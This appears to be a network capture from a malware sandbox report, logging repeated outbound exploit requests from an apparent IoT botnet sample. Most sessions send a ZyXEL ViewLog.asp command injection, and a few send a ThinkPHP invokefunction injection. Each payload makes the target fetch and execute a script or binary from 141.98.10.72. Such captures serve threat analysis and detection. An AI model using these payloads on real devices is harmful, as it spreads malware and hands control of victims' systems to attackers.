                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:53.591902018 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:32.502588034 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      568192.168.2.153839631.136.0.1498080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:13.777803898 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:14.424901009 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:15.672796965 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:18.264744043 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:23.384658098 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:33.368369102 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:53.591902018 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:34.550715923 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      569192.168.2.154454631.136.98.518080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:13.794296026 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:14.488915920 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:15.832807064 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:18.520720959 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:23.896688938 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:34.648324013 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:57.687917948 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:40.694453001 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      570192.168.2.153300631.136.215.2278080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:13.794400930 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:14.489044905 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:15.832793951 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:18.520730019 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:23.896684885 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:34.648269892 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:57.687819004 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:40.694461107 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      571192.168.2.153768295.86.95.2028080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:13.829433918 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      572192.168.2.1547802112.185.157.9080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:13.949038029 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      573192.168.2.155512295.211.60.13080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:14.130736113 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:14.336251020 CET490INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 14 Feb 2024 08:30:12 GMT
                                                      Connection: close
                                                      Content-Length: 311
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      574192.168.2.155907495.101.241.1280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:14.533215046 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:14.730300903 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:30:14 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:14 GMT
                                                      Connection: close
